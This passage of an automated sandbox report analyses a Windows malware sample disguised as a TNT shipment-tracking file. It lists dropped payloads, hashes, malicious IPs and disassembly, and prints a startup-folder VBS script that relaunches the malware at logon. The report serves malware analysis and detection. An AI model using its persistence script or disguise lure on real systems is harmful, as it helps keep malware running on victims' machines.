                                                  sh4.elfGet hashmaliciousUnknownBrowse
                                                  • 47.245.134.49
                                                  spc.elfGet hashmaliciousUnknownBrowse
                                                  • 8.221.71.12
                                                  ppc.elfGet hashmaliciousUnknownBrowse
                                                  • 47.241.21.57

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Temp\aut73E7.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.995904256257025
                                                  Encrypted:true
                                                  SSDEEP:6144:Vci2TrvdaTH0cdhd7TVlyEdJrbDrAt45wF5RM8BN5fNbQsdDStUS7334QhR:Vc9TrVaTHhZVlT3PAt45wF5qczNXFsTF
                                                  MD5:BE88657C1491A84DFEA7049F05A15806
                                                  SHA1:81D2BB07F0F0C7FD49EFD8784AF35AF2A36D2CA8
                                                  SHA-256:93C0836DDECDEE0A8BEC73E2447982554D37C5F722B1023AF524A354BD49DA1C
                                                  SHA-512:749C94EA2F68F616F168F03345B7C1949FA607B45596CB9542D136B2DB3A5348D13F1E2C07200E5D3A78BAA020C7BB799E12DED874B2DC15B6F36A6AED7F850E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.....8ZJ0l.]......R4...aM;...AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8.AXPK'.D0.Y.u.3z...:^*fB;!T69Ua"9>+W.jRQp5!6._"...dy+]-+.IU2eAXPE8ZJI5Y.i8U.qV#..9!.S.bX&.B...f*W.J....V+..;T1{R..3DX8AAXP.}ZJ|5QG...lL6DR7YF2.N1ES9JAX.A8ZJ04PGTX."L6DB7YFBMN3D.8AQXPE:ZJ64PGTX26J6DR7YF2I>7DX:AAXPE8XJp.PGDX2&L6DR'YF"IN3DX8QAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGz,WN86DR..B2I^3DXjEAX@E8ZJ04PGTX26L6dR79F2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04

                                                  C:\Users\user\AppData\Local\Temp\aut7417.tmp

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11098
                                                  Entropy (8bit):7.472131977432088
                                                  Encrypted:false
                                                  SSDEEP:192:abF9LyVGZZbUkfNh1NKaJXqat8k5LSL/BaAmVzzqOihRh1pUoGJD/OS:abF9OoZZbtca5qat8kpSFaPBa//NS
                                                  MD5:5281BA67B0385C8F3582BC8F5391AE1B
                                                  SHA1:2636EA41FC82DBE96A1D78F9C7214151F5DA0A2A
                                                  SHA-256:A7BA1FF3D22BA71F05C306231BF5F41386D08D8FC7F225CC15523E88F5A7FC1A
                                                  SHA-512:720D5F01FC839626FB3E8A5B04B195D549A2DF59E8888DF0CBAE6FF73C64B05AB2521C8C5E79993D2341CA6676F0D17554843CBE6B7C32A05B0E9A6AA907367E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........

                                                  C:\Users\user\AppData\Local\Temp\aut7917.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.995904256257025
                                                  Encrypted:true
                                                  SSDEEP:6144:Vci2TrvdaTH0cdhd7TVlyEdJrbDrAt45wF5RM8BN5fNbQsdDStUS7334QhR:Vc9TrVaTHhZVlT3PAt45wF5qczNXFsTF
                                                  MD5:BE88657C1491A84DFEA7049F05A15806
                                                  SHA1:81D2BB07F0F0C7FD49EFD8784AF35AF2A36D2CA8
                                                  SHA-256:93C0836DDECDEE0A8BEC73E2447982554D37C5F722B1023AF524A354BD49DA1C
                                                  SHA-512:749C94EA2F68F616F168F03345B7C1949FA607B45596CB9542D136B2DB3A5348D13F1E2C07200E5D3A78BAA020C7BB799E12DED874B2DC15B6F36A6AED7F850E
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:.....8ZJ0l.]......R4...aM;...AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8.AXPK'.D0.Y.u.3z...:^*fB;!T69Ua"9>+W.jRQp5!6._"...dy+]-+.IU2eAXPE8ZJI5Y.i8U.qV#..9!.S.bX&.B...f*W.J....V+..;T1{R..3DX8AAXP.}ZJ|5QG...lL6DR7YF2.N1ES9JAX.A8ZJ04PGTX."L6DB7YFBMN3D.8AQXPE:ZJ64PGTX26J6DR7YF2I>7DX:AAXPE8XJp.PGDX2&L6DR'YF"IN3DX8QAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGz,WN86DR..B2I^3DXjEAX@E8ZJ04PGTX26L6dR79F2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04

                                                  C:\Users\user\AppData\Local\Temp\aut7966.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11098
                                                  Entropy (8bit):7.472131977432088
                                                  Encrypted:false
                                                  SSDEEP:192:abF9LyVGZZbUkfNh1NKaJXqat8k5LSL/BaAmVzzqOihRh1pUoGJD/OS:abF9OoZZbtca5qat8kpSFaPBa//NS
                                                  MD5:5281BA67B0385C8F3582BC8F5391AE1B
                                                  SHA1:2636EA41FC82DBE96A1D78F9C7214151F5DA0A2A
                                                  SHA-256:A7BA1FF3D22BA71F05C306231BF5F41386D08D8FC7F225CC15523E88F5A7FC1A
                                                  SHA-512:720D5F01FC839626FB3E8A5B04B195D549A2DF59E8888DF0CBAE6FF73C64B05AB2521C8C5E79993D2341CA6676F0D17554843CBE6B7C32A05B0E9A6AA907367E
                                                  Malicious:false
                                                  Preview:EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........

                                                  C:\Users\user\AppData\Local\Temp\autA651.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.995904256257025
                                                  Encrypted:true
                                                  SSDEEP:6144:Vci2TrvdaTH0cdhd7TVlyEdJrbDrAt45wF5RM8BN5fNbQsdDStUS7334QhR:Vc9TrVaTHhZVlT3PAt45wF5qczNXFsTF
                                                  MD5:BE88657C1491A84DFEA7049F05A15806
                                                  SHA1:81D2BB07F0F0C7FD49EFD8784AF35AF2A36D2CA8
                                                  SHA-256:93C0836DDECDEE0A8BEC73E2447982554D37C5F722B1023AF524A354BD49DA1C
                                                  SHA-512:749C94EA2F68F616F168F03345B7C1949FA607B45596CB9542D136B2DB3A5348D13F1E2C07200E5D3A78BAA020C7BB799E12DED874B2DC15B6F36A6AED7F850E
                                                  Malicious:false
                                                  Preview:.....8ZJ0l.]......R4...aM;...AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8.AXPK'.D0.Y.u.3z...:^*fB;!T69Ua"9>+W.jRQp5!6._"...dy+]-+.IU2eAXPE8ZJI5Y.i8U.qV#..9!.S.bX&.B...f*W.J....V+..;T1{R..3DX8AAXP.}ZJ|5QG...lL6DR7YF2.N1ES9JAX.A8ZJ04PGTX."L6DB7YFBMN3D.8AQXPE:ZJ64PGTX26J6DR7YF2I>7DX:AAXPE8XJp.PGDX2&L6DR'YF"IN3DX8QAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGz,WN86DR..B2I^3DXjEAX@E8ZJ04PGTX26L6dR79F2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04

                                                  C:\Users\user\AppData\Local\Temp\autA6DF.tmp

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11098
                                                  Entropy (8bit):7.472131977432088
                                                  Encrypted:false
                                                  SSDEEP:192:abF9LyVGZZbUkfNh1NKaJXqat8k5LSL/BaAmVzzqOihRh1pUoGJD/OS:abF9OoZZbtca5qat8kpSFaPBa//NS
                                                  MD5:5281BA67B0385C8F3582BC8F5391AE1B
                                                  SHA1:2636EA41FC82DBE96A1D78F9C7214151F5DA0A2A
                                                  SHA-256:A7BA1FF3D22BA71F05C306231BF5F41386D08D8FC7F225CC15523E88F5A7FC1A
                                                  SHA-512:720D5F01FC839626FB3E8A5B04B195D549A2DF59E8888DF0CBAE6FF73C64B05AB2521C8C5E79993D2341CA6676F0D17554843CBE6B7C32A05B0E9A6AA907367E
                                                  Malicious:false
                                                  Preview:EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........

                                                  C:\Users\user\AppData\Local\Temp\cunili

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:ASCII text, with very long lines (29698), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):29698
                                                  Entropy (8bit):3.5475165415526244
                                                  Encrypted:false
                                                  SSDEEP:384:cdhx4G/5NHn3dncZugAgAhxT+NfidvT/gSvHD1n4861RvVItdps8MOoF1CFNjP1H:ZG/HH3d/p2KdvzgSfiVItdphKF4/1H
                                                  MD5:5D5AB430D2E0EEF55F075C7541D292FB
                                                  SHA1:1BBBED09FB08FD5447F968C9B90A992C281F5AB0
                                                  SHA-256:7BACF4A02DF8CD899DDF7A434AE60B9244766EC0FA2DE472F49C72F9F9B12AB4
                                                  SHA-512:2FCEF3319B5546B4E9B4B646583C9B0A666B084BC40A54B3E56E7E0424BD8C42AB9518956E8DCCE87F8B9B76EAD411E8510DAD51BA6AB794C4AC37FCA8B87D84
                                                  Malicious:false
                                                  Preview:00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000cc5e8c30ef480000f4c0ef48f4807c800089ff65f482700008b80e8e85ccccccccc00c555af124812781278555ccccccccccc00cf74408025802480258cccccccccc00c5e8dff48fff5ef480c8f48f48d430ecf48d48c3f521fc1ecf58c3d421fc1ecf48c3d521fc1ecf58c3d421fc1ecf48c3e521fc1ecf58c3e421fc1ecf48c3e521fc1ecf58e421fc1ecf48f48f43f480009800f78f581b0f40048fffff4c0000f4ce48edf430ecf48e58f530ecf58e480ecf48e480ecf48d580ecf58d480ecf48d48edf48eb82f4c3e8e85cccccc00c5e8c3be0e800048e5850b0e48f58170430002e5e48e48800048e58f4837143f48f58f480c8f480e0000f4ce48240048f58e48140048f48e58250058f48f487040048f580c60000bf58350058f48f480

                                                  C:\Users\user\AppData\Local\Temp\maneuverability

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):287744
                                                  Entropy (8bit):7.995904256257025
                                                  Encrypted:true
                                                  SSDEEP:6144:Vci2TrvdaTH0cdhd7TVlyEdJrbDrAt45wF5RM8BN5fNbQsdDStUS7334QhR:Vc9TrVaTHhZVlT3PAt45wF5qczNXFsTF
                                                  MD5:BE88657C1491A84DFEA7049F05A15806
                                                  SHA1:81D2BB07F0F0C7FD49EFD8784AF35AF2A36D2CA8
                                                  SHA-256:93C0836DDECDEE0A8BEC73E2447982554D37C5F722B1023AF524A354BD49DA1C
                                                  SHA-512:749C94EA2F68F616F168F03345B7C1949FA607B45596CB9542D136B2DB3A5348D13F1E2C07200E5D3A78BAA020C7BB799E12DED874B2DC15B6F36A6AED7F850E
                                                  Malicious:false
                                                  Preview:.....8ZJ0l.]......R4...aM;...AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8.AXPK'.D0.Y.u.3z...:^*fB;!T69Ua"9>+W.jRQp5!6._"...dy+]-+.IU2eAXPE8ZJI5Y.i8U.qV#..9!.S.bX&.B...f*W.J....V+..;T1{R..3DX8AAXP.}ZJ|5QG...lL6DR7YF2.N1ES9JAX.A8ZJ04PGTX."L6DB7YFBMN3D.8AQXPE:ZJ64PGTX26J6DR7YF2I>7DX:AAXPE8XJp.PGDX2&L6DR'YF"IN3DX8QAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGz,WN86DR..B2I^3DXjEAX@E8ZJ04PGTX26L6dR79F2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04PGTX26L6DR7YF2IN3DX8AAXPE8ZJ04

                                                  C:\Users\user\AppData\Local\Temp\w2-0G0-7

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\mobsync.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1239949490932863
                                                  Encrypted:false
                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                  MD5:271D5F995996735B01672CF227C81C17
                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                  Malicious:false
                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\hurtling\jailkeeper.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1169920
                                                  Entropy (8bit):7.148239420007654
                                                  Encrypted:false
                                                  SSDEEP:24576:2u6J33O0c+JY5UZ+XC0kGso6FaDKn/Jzznkc+zflnmgWY:Yu0c++OCvkGs9FaDW/JzTvQCY
                                                  MD5:C32B24D16816AF9ADDD23883F8B474BB
                                                  SHA1:17E0EF8034418EE6BF28E6436A95E5C16A4F2B2E
                                                  SHA-256:DE25835C72E839F3E2EF5636B3A144A584A4A5F9AEC9BFACF474A9740EA135DD
                                                  SHA-512:D611DDB8EB9366FEF7A347D1D5EA6DA5DF463F3AF867B20FF040B918CFD229C73EB5A8AF11E465B01FB9098972F07A041D90F6E6F12CB9E12349F29C4271D488
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 58%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....ag.........."..................}............@..........................P......Bq....@...@.......@.....................L...|....p...Q.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....Q...p...R..................@..@.reloc...q.......r...h..............@..B........................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):284
                                                  Entropy (8bit):3.3784972597051195
                                                  Encrypted:false
                                                  SSDEEP:6:DMM8lfm3OOQdUfclzXUEZ+lX1KZyynriIM8lfQVn:DsO+vNlDQ1KXmA2n
                                                  MD5:5936A518D2C8F5581F03EBAED71EC707
                                                  SHA1:C11B74CFF08AB44AE294975F6E072C7B75C7E072
                                                  SHA-256:4F8F50193602C13A2CA1DA2BACADABC8BD9B8617477606E3CB1985ED2C19A35A
                                                  SHA-512:CA3D347A0CAF14CE3284310CA8452B6A2566243E0CC94CDB833F7F105758303CCEAF75FB7E34FDE4BA2758F416A6632D32A1C82D1F118F33EADDF2877FDE02B1
                                                  Malicious:true
                                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.h.u.r.t.l.i.n.g.\.j.a.i.l.k.e.e.p.e.r...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.148239420007654
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:TNT AWB TRACKING DETAILS.exe
                                                  File size:1'169'920 bytes
                                                  MD5:c32b24d16816af9addd23883f8b474bb
                                                  SHA1:17e0ef8034418ee6bf28e6436a95e5c16a4f2b2e
                                                  SHA256:de25835c72e839f3e2ef5636b3a144a584a4a5f9aec9bfacf474a9740ea135dd
                                                  SHA512:d611ddb8eb9366fef7a347d1d5ea6da5df463f3af867b20ff040b918cfd229c73eb5a8af11e465b01fb9098972f07a041d90f6e6f12cb9e12349f29c4271d488
                                                  SSDEEP:24576:2u6J33O0c+JY5UZ+XC0kGso6FaDKn/Jzznkc+zflnmgWY:Yu0c++OCvkGs9FaDW/JzTvQCY
                                                  TLSH:9045CF2273DDC360CB669173BF69B7016EBF3C614630B85B2F980D7DA950162262D7A3
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                  File Icon

                                                  Icon Hash:aaf3e3e3938382a0

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x427dcd
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x67610E04 [Tue Dec 17 05:37:08 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007F6F40B72A4Ah
                                                  jmp 00007F6F40B65814h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push edi
                                                  push esi
                                                  mov esi, dword ptr [esp+10h]
                                                  mov ecx, dword ptr [esp+14h]
                                                  mov edi, dword ptr [esp+0Ch]
                                                  mov eax, ecx
                                                  mov edx, ecx
                                                  add eax, esi
                                                  cmp edi, esi
                                                  jbe 00007F6F40B6599Ah
                                                  cmp edi, eax
                                                  jc 00007F6F40B65CFEh
                                                  bt dword ptr [004C31FCh], 01h
                                                  jnc 00007F6F40B65999h
                                                  rep movsb
                                                  jmp 00007F6F40B65CACh
                                                  cmp ecx, 00000080h
                                                  jc 00007F6F40B65B64h
                                                  mov eax, edi
                                                  xor eax, esi
                                                  test eax, 0000000Fh
                                                  jne 00007F6F40B659A0h
                                                  bt dword ptr [004BE324h], 01h
                                                  jc 00007F6F40B65E70h
                                                  bt dword ptr [004C31FCh], 00000000h
                                                  jnc 00007F6F40B65B3Dh
                                                  test edi, 00000003h
                                                  jne 00007F6F40B65B4Eh
                                                  test esi, 00000003h
                                                  jne 00007F6F40B65B2Dh
                                                  bt edi, 02h
                                                  jnc 00007F6F40B6599Fh
                                                  mov eax, dword ptr [esi]
                                                  sub ecx, 04h
                                                  lea esi, dword ptr [esi+04h]
                                                  mov dword ptr [edi], eax
                                                  lea edi, dword ptr [edi+04h]
                                                  bt edi, 03h
                                                  jnc 00007F6F40B659A3h
                                                  movq xmm1, qword ptr [esi]
                                                  sub ecx, 08h
                                                  lea esi, dword ptr [esi+08h]
                                                  movq qword ptr [edi], xmm1
                                                  lea edi, dword ptr [edi+08h]
                                                  test esi, 00000007h
                                                  je 00007F6F40B659F5h
                                                  bt esi, 03h
                                                  jnc 00007F6F40B65A48h

                                                  Rich Headers

                                                  Programming Language:
                                                  • [ASM] VS2013 build 21005
                                                  • [ C ] VS2013 build 21005
                                                  • [C++] VS2013 build 21005
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  • [ASM] VS2013 UPD4 build 31101
                                                  • [RES] VS2013 build 21005
                                                  • [LNK] VS2013 UPD4 build 31101

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x551bc.rsrc
